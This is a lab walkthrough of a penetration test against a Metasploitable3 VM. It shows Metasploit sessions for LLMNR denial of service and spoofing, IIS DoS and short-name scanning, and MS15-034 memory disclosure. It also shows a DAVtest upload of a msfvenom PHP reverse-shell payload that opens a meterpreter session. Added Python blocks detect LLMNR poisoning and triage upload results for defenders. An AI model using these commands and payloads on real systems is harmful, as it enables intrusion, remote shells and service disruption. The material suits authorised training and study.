Penetration Testing Example: Metasploitable3 Target Machine
Lab environment: one Kali VM (4 GB RAM) and one Metasploitable3 target with IP address 192.168.22.20
Lab objective: perform a penetration test against the Metasploitable3 target
Lab steps:
(1) Scan the target
1. Scan the target with Nessus
2. Check that the target's services are running normally
3. Start the Metasploit framework
Scan the target with nmap:
msf6 > db_nmap -A -T4 192.168.22.20
(2) Penetration
1. LLMNR buffer overflow DoS attack
msf6 > search llmnr    # search for a matching module using the information gathered
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/dos/windows/llmnr/ms11_030_dnsapi 2011-04-12 normal No Microsoft Windows DNSAPI.dll LLMNR Buffer Underrun DoS
1 auxiliary/scanner/llmnr/query normal No LLMNR Query
2 auxiliary/server/capture/smb normal No Authentication Capture: SMB
3 auxiliary/spoof/llmnr/llmnr_response normal No LLMNR Spoofer
Interact with a module by name or index. For example info 3, use 3 or use auxiliary/spoof/llmnr/llmnr_response
msf6 > use auxiliary/dos/windows/llmnr/ms11_030_dnsapi    # load the module
msf6 auxiliary(dos/windows/llmnr/ms11_030_dnsapi) > set    # list the current settings
Global
======
No entries in data store.
Module: dos/windows/llmnr/ms11_030_dnsapi
=========================================
Name Value
---- -----
CHOST
CPORT
RHOSTS 224.0.0.252
RPORT 5355
VERBOSE false
WORKSPACE
msf6 auxiliary(dos/windows/llmnr/ms11_030_dnsapi) > show options    # show the required options
Module options (auxiliary/dos/windows/llmnr/ms11_030_dnsapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 224.0.0.252 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 5355 yes The target port (UDP)
msf6 auxiliary(dos/windows/llmnr/ms11_030_dnsapi) > set rhosts 192.168.22.20    # set the target IP address
rhosts => 192.168.22.20
msf6 auxiliary(dos/windows/llmnr/ms11_030_dnsapi) > run    # execute
[*] Running module against 192.168.22.20
[*] Sending Ipv6 LLMNR query to 192.168.22.20
[*] Sending Ipv4 LLMNR query to 192.168.22.20
[*] Note, in a default configuration, the service will restart automatically twice.
[*] In order to ensure it is completely dead, wait up to 5 minutes and run it again.
[*] Auxiliary module execution completed
2. LLMNR spoofing (can be used for monitoring)
msf6 > use auxiliary/spoof/llmnr/llmnr_response    # load the module
msf6 auxiliary(spoof/llmnr/llmnr_response) > set    # list the current settings
Global
======
No entries in data store.
Module: spoof/llmnr/llmnr_response
==================================
Name Value
---- -----
GATEWAY_PROBE_HOST 8.8.8.8
GATEWAY_PROBE_PORT
INTERFACE
REGEX .*
SECRET 1297303073
SPOOFIP
TIMEOUT 500
TTL 30
VERBOSE false
WORKSPACE
msf6 auxiliary(spoof/llmnr/llmnr_response) > show options    # show the required options
Module options (auxiliary/spoof/llmnr/llmnr_response):
Name Current Setting Required Description
---- --------------- -------- -----------
INTERFACE no The name of the interface
REGEX .* yes Regex applied to the LLMNR Name to determine if spoofed reply is sent
SPOOFIP yes IP address with which to poison responses
TIMEOUT 500 yes The number of seconds to wait for new data
TTL 30 no Time To Live for the spoofed response
Auxiliary action:
Name Description
---- -----------
Service Run LLMNR spoofing service
msf6 auxiliary(spoof/llmnr/llmnr_response) > set spoofip 192.168.22.20    # set the attack target's IP address
spoofip => 192.168.22.20
msf6 auxiliary(spoof/llmnr/llmnr_response) > run    # execute
[*] Auxiliary module running as background job 0.
msf6 auxiliary(spoof/llmnr/llmnr_response) >
[*] LLMNR Spoofer started. Listening for LLMNR requests with REGEX "(?-mix:.*)" ...
[+] 192.168.22.1 llmnr - wpad. matches regex, responding with 192.168.22.20
msf6 auxiliary(spoof/llmnr/llmnr_response) > [+] 192.168.22.20 llmnr - metasploitable3. matches regex, responding with 192.168.22.20
[+] 192.168.22.1 llmnr - wpad. matches regex, responding with 192.168.22.20
[+] 192.168.22.20 llmnr - metasploitable3. matches regex, responding with 192.168.22.20
[+] 192.168.22.1 llmnr - wpad. matches regex, responding with 192.168.22.20
[+] 192.168.22.1 llmnr - wpad. matches regex, responding with 192.168.22.20
[+] 192.168.22.1 llmnr - wpad. matches regex, responding with 192.168.22.20
[+] 192.168.22.20 llmnr - metasploitable3. matches regex, responding with 192.168.22.20
Press Ctrl+C first to get the prompt back
msf6 auxiliary(spoof/llmnr/llmnr_response) > jobs    # list background jobs
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
0 Auxiliary: spoof/llmnr/llmnr_response
msf6 auxiliary(spoof/llmnr/llmnr_response) > kill 0    # kill the background spoofing job (otherwise it keeps listening)
[*] Stopping the following job(s): 0
[*] Stopping job 0
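The spoofer above answered every LLMNR query on the segment, including wpad, with a single address. As an added defender-side example that is not part of the original writeup, the Python below parses LLMNR responses (DNS wire format on UDP 5355) and flags the patterns visible in that output: a response for a sensitive name such as wpad, one host answering for several different names, and an answer whose address differs from the sender. The packets are constructed inline; the function names and the SENSITIVE_NAMES set are this example's own assumptions.

```python
import struct

# Names an LLMNR poisoner is eager to claim; "wpad" is what the spoofer above answered.
SENSITIVE_NAMES = {"wpad", "proxysrv", "isatap"}  # assumption: tune to your environment

def _encode_name(name):
    out = b"".join(bytes([len(label)]) + label.encode("ascii") for label in name.strip(".").split("."))
    return out + b"\x00"

def _decode_name(data, offset):
    labels = []
    while True:
        length, offset = data[offset], offset + 1
        if length == 0:
            break
        if length & 0xC0:  # compression pointer (allowed by RFC 4795): follow it and stop
            labels.append(_decode_name(data, ((length & 0x3F) << 8) | data[offset])[0])
            return ".".join(labels), offset + 1
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), offset

def build_llmnr_response(txid, name, ip, ttl=30):
    """Constructed packet: LLMNR A-record response (RFC 4795 reuses the DNS wire layout)."""
    header = struct.pack("!HHHHHH", txid, 0x8000, 1, 1, 0, 0)  # QR=1, 1 question, 1 answer
    question = _encode_name(name) + struct.pack("!HH", 1, 1)    # QTYPE A, QCLASS IN
    rdata = bytes(int(octet) for octet in ip.split("."))
    answer = _encode_name(name) + struct.pack("!HHIH", 1, 1, ttl, len(rdata)) + rdata
    return header + question + answer

def parse_llmnr(data):
    """Return transaction id, response flag and the A-record answers of one LLMNR message."""
    txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", data[:12])
    off = 12
    for _ in range(qdcount):
        off = _decode_name(data, off)[1] + 4        # skip QNAME, QTYPE and QCLASS
    answers = []
    for _ in range(ancount):
        name, off = _decode_name(data, off)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", data[off:off + 10])
        rdata, off = data[off + 10:off + 10 + rdlen], off + 10 + rdlen
        if rtype == 1 and rdlen == 4:               # only A records are interesting here
            answers.append((name.lower(), ".".join(str(b) for b in rdata), ttl))
    return {"id": txid, "is_response": bool(flags & 0x8000), "answers": answers}

def detect_spoofing(packets):
    """packets: list of (sender_ip, raw_udp_payload). Returns human-readable alerts."""
    alerts, names_by_sender = [], {}
    for sender, raw in packets:
        msg = parse_llmnr(raw)
        if not msg["is_response"]:
            continue                                # queries are normal; only responses matter
        for name, ip, _ttl in msg["answers"]:
            names_by_sender.setdefault(sender, set()).add(name)
            if name.split(".")[0] in SENSITIVE_NAMES:
                alerts.append(f"{sender} answered LLMNR for sensitive name '{name}' -> {ip}")
            if ip != sender:
                alerts.append(f"{sender} answered '{name}' with a different address {ip}")
    for sender, names in names_by_sender.items():
        if len(names) > 1:                          # one host claiming many names = poisoner
            alerts.append(f"{sender} claimed {len(names)} names: {sorted(names)}")
    return alerts

# Constructed traffic mirroring the output above: .20 answers both wpad and its own name.
SAMPLE_TRAFFIC = [
    ("192.168.22.20", build_llmnr_response(0x1001, "wpad", "192.168.22.20")),
    ("192.168.22.20", build_llmnr_response(0x1002, "metasploitable3", "192.168.22.20")),
    ("192.168.22.50", build_llmnr_response(0x1003, "printer", "192.168.22.50")),  # benign
]
```

In production the packets would come from a capture of 224.0.0.252:5355 on the monitored segment. The usual mitigation is to switch LLMNR off entirely through the Group Policy setting "Turn off multicast name resolution", which removes the protocol this module abuses.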
3. ASP stack exhaustion denial-of-service attack
msf6 auxiliary(dos/windows/ftp/iis_list_exhaustion) > search Microsoft IIS    # search for the matching module using the information gathered
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/http/iis_auth_bypass 2010-07-02 normal No MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass
1 auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof 2010-12-21 normal No Microsoft IIS FTP Server Encoded Response Overflow Trigger
2 auxiliary/dos/windows/ftp/iis_list_exhaustion 2009-09-03 normal No Microsoft IIS FTP Server LIST Stack Exhaustion
3 auxiliary/dos/windows/http/ms10_065_ii6_asp_dos 2010-09-14 normal No Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service
4 auxiliary/scanner/http/iis_internal_ip normal No Microsoft IIS HTTP Internal IP Disclosure
5 auxiliary/scanner/http/iis_shortname_scanner normal Yes Microsoft IIS shortname vulnerability scanner
6 auxiliary/scanner/http/owa_iis_internal_ip 2012-12-17 normal No Outlook Web App (OWA) / Client Access Server (CAS) IIS HTTP Internal IP Disclosure
7 exploit/windows/ftp/ms09_053_ftpd_nlst 2009-08-31 great No MS09-053 Microsoft IIS FTP Server NLST Response Overflow
8 exploit/windows/http/umbraco_upload_aspx 2012-06-28 excellent No Umbraco CMS Remote Command Execution
9 exploit/windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Yes Microsoft IIS WebDav ScStoragePathFromUrl Overflow
10 exploit/windows/iis/iis_webdav_upload_asp 2004-12-31 excellent No Microsoft IIS WebDAV Write Access Code Execution
11 exploit/windows/iis/ms01_023_printer 2001-05-01 good Yes MS01-023 Microsoft IIS 5.0 Printer Host Header Overflow
12 exploit/windows/iis/ms01_026_dbldecode 2001-05-15 excellent Yes MS01-026 Microsoft IIS/PWS CGI Filename Double Decode Command Execution
13 exploit/windows/iis/ms01_033_idq 2001-06-18 good No MS01-033 Microsoft IIS 5.0 IDQ Path Overflow
14 exploit/windows/iis/ms02_018_htr 2002-04-10 good No MS02-018 Microsoft IIS 4.0 .HTR Path Overflow
15 exploit/windows/iis/ms02_065_msadc 2002-11-20 normal Yes MS02-065 Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow
16 exploit/windows/iis/ms03_007_ntdll_webdav 2003-05-30 great Yes MS03-007 Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow
17 exploit/windows/iis/msadc 1998-07-17 excellent Yes MS99-025 Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution
18 exploit/windows/isapi/ms00_094_pbserver 2000-12-04 good Yes MS00-094 Microsoft IIS Phone Book Service Overflow
19 exploit/windows/isapi/ms03_022_nsiislog_post 2003-06-25 good Yes MS03-022 Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow
20 exploit/windows/isapi/ms03_051_fp30reg_chunked 2003-11-11 good Yes MS03-051 Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow
21 exploit/windows/isapi/rsa_webagent_redirect 2005-10-21 good Yes Microsoft IIS ISAPI RSA WebAgent Redirect Overflow
22 exploit/windows/isapi/w3who_query 2004-12-06 good Yes Microsoft IIS ISAPI w3who.dll Query String Overflow
23 exploit/windows/ssl/ms04_011_pct 2004-04-13 average No MS04-011 Microsoft Private Communications Transport Overflow
Interact with a module by name or index. For example info 23, use 23 or use exploit/windows/ssl/ms04_011_pct
msf6 auxiliary(dos/windows/ftp/iis_list_exhaustion) > use auxiliary/dos/windows/http/ms10_065_ii6_asp_dos    # load the module
msf6 auxiliary(dos/windows/http/ms10_065_ii6_asp_dos) > show options    # show the required options
Module options (auxiliary/dos/windows/http/ms10_065_ii6_asp_dos):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
URI /page.asp yes URI to request
VHOST no The virtual host name to use in requests
msf6 auxiliary(dos/windows/http/ms10_065_ii6_asp_dos) > set rhosts 192.168.22.20    # target IP address
rhosts => 192.168.22.20
msf6 auxiliary(dos/windows/http/ms10_065_ii6_asp_dos) > set rport 8022    # target port number
rport => 8022
msf6 auxiliary(dos/windows/http/ms10_065_ii6_asp_dos) > run    # execute
[*] Running module against 192.168.22.20
[*] 192.168.22.20:8022 - Attacking http://192.168.22.20:8022/page.asp
Visiting the target's web page shows a noticeable delay and the target itself becomes sluggish, but the attack is not stable.
4. Microsoft IIS short-name vulnerability scanner
msf6 auxiliary(scanner/http/iis_internal_ip) > use auxiliary/scanner/http/iis_shortname_scanner    # load the module
msf6 auxiliary(scanner/http/iis_shortname_scanner) > set    # list the current settings
Global
======
No entries in data store.
Module: scanner/http/iis_shortname_scanner
==========================================
Name Value
---- -----
DOMAIN WORKSTATION
DigestAuthIIS true
FingerprintCheck true
HTTP::header_folding false
HTTP::method_random_case false
HTTP::method_random_invalid false
HTTP::method_random_valid false
HTTP::pad_fake_headers false
HTTP::pad_fake_headers_count 0
HTTP::pad_get_params false
HTTP::pad_get_params_count 16
HTTP::pad_method_uri_count 1
HTTP::pad_method_uri_type space
HTTP::pad_post_params false
HTTP::pad_post_params_count 16
HTTP::pad_uri_version_count 1
HTTP::pad_uri_version_type space
HTTP::uri_dir_fake_relative false
HTTP::uri_dir_self_reference false
HTTP::uri_encode_mode hex-normal
HTTP::uri_fake_end false
HTTP::uri_fake_params_start false
HTTP::uri_full_url false
HTTP::uri_use_backslashes false
HTTP::version_random_invalid false
HTTP::version_random_valid false
HttpClientTimeout
HttpPassword
HttpRawHeaders
HttpTrace false
HttpTraceColors red/blu
HttpTraceHeadersOnly false
HttpUsername
PATH /
Proxies
RHOSTS
RPORT 80
SSL false
SSLVersion Auto
THREADS 20
UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
VERBOSE false
VHOST
WORKSPACE
msf6 auxiliary(scanner/http/iis_shortname_scanner) > set rhosts 192.168.22.20    # target IP address
rhosts => 192.168.22.20
msf6 auxiliary(scanner/http/iis_shortname_scanner) > show options    # show the required options
Module options (auxiliary/scanner/http/iis_shortname_scanner):
Name Current Setting Required Description
---- --------------- -------- -----------
PATH / yes The base path to start scanning from
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.22.20 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
THREADS 20 yes Number of threads to use
VHOST no HTTP server virtual host
msf6 auxiliary(scanner/http/iis_shortname_scanner) > run    # execute
[*] Running module against 192.168.22.20
[*] Scanning in progress...
[+] Found 1 directories
[+] http://192.168.22.20/aspnet*~1
[+] Found 2 files
[+] http://192.168.22.20/index*~1.htm*
[+] http://192.168.22.20/six_of*~1.zip*
[*] Auxiliary module execution completed
5. DAVtest upload vulnerability
┌──(root💀kali)-[~]
└─# davtest -url http://192.168.22.20:8585/uploads/    # first test which file types can be uploaded
********************************************************
Testing DAV connection
OPEN SUCCEED: http://192.168.22.20:8585/uploads
********************************************************
NOTE Random string for this session: QlP180WUMS
********************************************************
Creating directory
MKCOL SUCCEED: Created http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS
********************************************************
Sending test files
PUT shtml SUCCEED: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.shtml
PUT jhtml SUCCEED: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.jhtml
PUT asp SUCCEED: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.asp
PUT html SUCCEED: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.html
PUT jsp SUCCEED: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.jsp
PUT cgi SUCCEED: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.cgi
PUT pl SUCCEED: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.pl
PUT txt SUCCEED: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.txt
PUT php SUCCEED: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.php
PUT cfm SUCCEED: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.cfm
PUT aspx SUCCEED: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.aspx
********************************************************
Checking for test file execution
EXEC shtml FAIL
EXEC jhtml FAIL
EXEC asp FAIL
EXEC html SUCCEED: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.html
EXEC jsp FAIL
EXEC cgi FAIL
EXEC pl FAIL
EXEC txt SUCCEED: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.txt
EXEC php SUCCEED: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.php
EXEC cfm FAIL
EXEC aspx FAIL
********************************************************
/usr/bin/davtest Summary:
Created: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.shtml
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.jhtml
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.asp
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.html
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.jsp
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.cgi
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.pl
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.txt
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.php
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.cfm
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.aspx
Executes: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.html
Executes: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.txt
Executes: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.php
┌──(root💀kali)-[~]
└─# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.22.130 LPORT=888 -f raw > demon.php    # generate the payload (LHOST is the local listening IP address, LPORT the local listening port)
┌──(root💀kali)-[~]
└─# davtest -url http://192.168.22.20:8585/uploads/ -uploadfile demon.php -uploadloc DavTestDir_QlP180WUMS/8888.php    # upload the payload (DavTestDir_QlP180WUMS is the path reachable on the web page)
********************************************************
Testing DAV connection
OPEN SUCCEED: http://192.168.22.20:8585/uploads
********************************************************
unless Uploading file
Upload succeeded: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/8888.php
msf6 > use exploit/multi/handler    # load the module
[*] Using configured payload php/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set payload php/meterpreter_reverse_tcp    # use the payload configured earlier
payload => php/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.22.130    # local IP address (must match the one set in the payload)
lhost => 192.168.22.130
msf6 exploit(multi/handler) > set lport 888    # local listening port (must match the one set in the payload)
lport => 888
msf6 exploit(multi/handler) > run    # execute (after starting the handler, open the uploaded file in the browser)
[*] Started reverse TCP handler on 192.168.22.130:888
msf6 exploit(multi/handler) > run    # after opening the uploaded file on the web page, the exploit succeeds
[*] Started reverse TCP handler on 192.168.22.130:888
[*] Meterpreter session 2 opened (192.168.22.130:888 -> 192.168.22.20:55520) at 2021-02-08 17:42:08 +0800
meterpreter > ls    # test: we now have a shell
Listing: C:\wamp\www\uploads\DavTestDir_QlP180WUMS
==================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 34280 fil 2021-02-08 17:32:37 +0800 8888.php
100666/rw-rw-rw- 44 fil 2021-02-08 15:29:23 +0800 davtest_QlP180WUMS.asp
100666/rw-rw-rw- 44 fil 2021-02-08 15:29:24 +0800 davtest_QlP180WUMS.aspx
100666/rw-rw-rw- 42 fil 2021-02-08 15:29:24 +0800 davtest_QlP180WUMS.cfm
100666/rw-rw-rw- 66 fil 2021-02-08 15:29:23 +0800 davtest_QlP180WUMS.cgi
100666/rw-rw-rw- 26 fil 2021-02-08 15:29:23 +0800 davtest_QlP180WUMS.html
100666/rw-rw-rw- 37 fil 2021-02-08 15:29:23 +0800 davtest_QlP180WUMS.jhtml
100666/rw-rw-rw- 37 fil 2021-02-08 15:29:23 +0800 davtest_QlP180WUMS.jsp
100666/rw-rw-rw- 24 fil 2021-02-08 15:29:24 +0800 davtest_QlP180WUMS.php
100666/rw-rw-rw- 66 fil 2021-02-08 15:29:23 +0800 davtest_QlP180WUMS.pl
100666/rw-rw-rw- 179 fil 2021-02-08 15:29:23 +0800 davtest_QlP180WUMS.shtml
100666/rw-rw-rw- 19 fil 2021-02-08 15:29:23 +0800 davtest_QlP180WUMS.txt
meterpreter >
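davtest reported html and txt as "Executes" alongside php, but only the php hit means the server ran uploaded code; the other two are static files served back. As an added example that is not part of the original writeup, the Python below parses davtest's PUT/EXEC lines and ranks each extension, separating real server-side execution from static content. The sample output is a constructed, shortened copy of the run above; SERVER_SIDE and the verdict strings are this example's own choices.

```python
import re

# Extensions this server would hand to an interpreter: a successful EXEC for one of these
# means uploaded content runs as code on the server (the .php hit above). Assumed list.
SERVER_SIDE = {"php", "asp", "aspx", "jsp", "jhtml", "cfm", "pl", "cgi", "shtml"}

# davtest prints "PUT <ext> SUCCEED: <url>" or "EXEC <ext> FAIL" for every extension it tries.
LINE_RE = re.compile(r"^(PUT|EXEC)\s+(\w+)\s+(SUCCEED|FAIL)\b")

def triage_davtest(output):
    """Map each extension to its PUT/EXEC result and a verdict a report can quote."""
    results = {}
    for line in output.splitlines():
        match = LINE_RE.match(line.strip())
        if not match:
            continue                                   # banners, summary lines, noise
        kind, ext, status = match.groups()
        entry = results.setdefault(ext.lower(), {"put": False, "exec": False})
        entry[kind.lower()] = (status == "SUCCEED")
    for ext, entry in results.items():
        if entry["put"] and entry["exec"] and ext in SERVER_SIDE:
            entry["verdict"] = "CRITICAL: unauthenticated upload plus server-side execution"
        elif entry["put"] and entry["exec"]:
            entry["verdict"] = "MEDIUM: upload is served back as static content (stored XSS, defacement)"
        elif entry["put"]:
            entry["verdict"] = "LOW: upload accepted but never executed (abuse as file storage)"
        else:
            entry["verdict"] = "OK: upload rejected"
    return results

def critical_extensions(output):
    """Extensions that give code execution; a non-empty list means the share needs fixing."""
    return sorted(ext for ext, r in triage_davtest(output).items() if r["verdict"].startswith("CRITICAL"))

# Constructed sample: a shortened copy of the davtest run above, plus one rejected PUT.
SAMPLE_OUTPUT = """\
Sending test files
PUT shtml SUCCEED: http://192.168.22.20:8585/uploads/d/x.shtml
PUT asp SUCCEED: http://192.168.22.20:8585/uploads/d/x.asp
PUT html SUCCEED: http://192.168.22.20:8585/uploads/d/x.html
PUT txt SUCCEED: http://192.168.22.20:8585/uploads/d/x.txt
PUT php SUCCEED: http://192.168.22.20:8585/uploads/d/x.php
PUT aspx FAIL
Checking for test file execution
EXEC shtml FAIL
EXEC asp FAIL
EXEC html SUCCEED: http://192.168.22.20:8585/uploads/d/x.html
EXEC txt SUCCEED: http://192.168.22.20:8585/uploads/d/x.txt
EXEC php SUCCEED: http://192.168.22.20:8585/uploads/d/x.php
"""
```

The two findings that matter on the server side are both visible in the run above: anonymous MKCOL/PUT on /uploads, and a script handler that executes .php from that directory. Requiring authentication for write methods and disabling script execution under the upload path removes the CRITICAL entry.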
6. HTTP protocol stack request handling: system memory information disclosure
msf6 > search ms15_034    # search for the matching module
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/dos/http/ms15_034_ulonglongadd normal Yes MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service
1 auxiliary/scanner/http/ms15_034_http_sys_memory_dump normal Yes MS15-034 HTTP Protocol Stack Request Handling HTTP.SYS Memory Information Disclosure
Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
msf6 auxiliary(scanner/http/ms15_034_http_sys_memory_dump) > show options    # show the required options
Module options (auxiliary/scanner/http/ms15_034_http_sys_memory_dump):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SUPPRESS_REQUEST true yes Suppress output of the requested resource
TARGETURI / no URI to the site (e.g /site/) or a valid file resource (e.g /welcome.png)
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
msf6 auxiliary(scanner/http/ms15_034_http_sys_memory_dump) > set rhosts 192.168.22.20    # set the target IP address
rhosts => 192.168.22.20
msf6 auxiliary(scanner/http/ms15_034_http_sys_memory_dump) > run    # execute
[+] Target may be vulnerable...
[+] Stand by...
[-] Memory dump start position not found, dumping all data instead
[+] Memory contents:
48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 |HTTP/1.1 400 Bad|
20 52 65 71 75 65 73 74 0d 0a 43 6f 6e 74 65 6e | Request..Conten|
74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d |t-Type: text/htm|
6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 |l; charset=us-as|
63 69 69 0d 0a 53 65 72 76 65 72 3a 20 4d 69 63 |cii..Server: Mic|
72 6f 73 6f 66 74 2d 48 54 54 50 41 50 49 2f 32 |rosoft-HTTPAPI/2|
2e 30 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 30 |.0..Date: Mon, 0|
38 20 46 65 62 20 32 30 32 31 20 31 30 3a 31 33 |8 Feb 2021 10:13|
3a 30 34 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 |:04 GMT..Connect|
69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 |ion: close..Cont|
65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 34 36 0d |ent-Length: 346.|
0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d |...<!DOCTYPE HTM|
4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 |L PUBLIC "-//W3C|
2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f |//DTD HTML 4.01/|
2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e |/EN""http://www.|
77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f |w3.org/TR/html4/|
73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 |strict.dtd">..<H|
54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 |TML><HEAD><TITLE|
3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 |>Bad Request</TI|
54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 |TLE>..<META HTTP|
2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d |-EQUIV="Content-|
54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 |Type" Content="t|
65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 |ext/html; charse|
74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 |t=us-ascii"></HE|
41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 |AD>..<BODY><h2>B|
61 64 20 52 65 71 75 65 73 74 20 2d 20 52 65 71 |ad Request - Req|
75 65 73 74 20 54 6f 6f 20 4c 6f 6e 67 3c 2f 68 |uest Too Long</h|
32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 |2>..<hr><p>HTTP |
45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 73 |Error 400. The s|
69 7a 65 20 6f 66 20 74 68 65 20 72 65 71 75 65 |ize of the reque|
73 74 20 68 65 61 64 65 72 73 20 69 73 20 74 6f |st headers is to|
6f 20 6c 6f 6e 67 2e 3c 2f 70 3e 0d 0a 3c 2f 42 |o long.</p>..</B|
4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a |ODY></HTML>..|
[+] Memory dump saved to /root/.msf4/loot/20210208181305_default_192.168.22.20_iis.ms15034_283153.bin
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
7. HTTP protocol stack request handling denial of service
msf6 > search ms15_034    # look up the matching module
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/dos/http/ms15_034_ulonglongadd normal Yes MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service
1 auxiliary/scanner/http/ms15_034_http_sys_memory_dump normal Yes MS15-034 HTTP Protocol Stack Request Handling HTTP.SYS Memory Information Disclosure
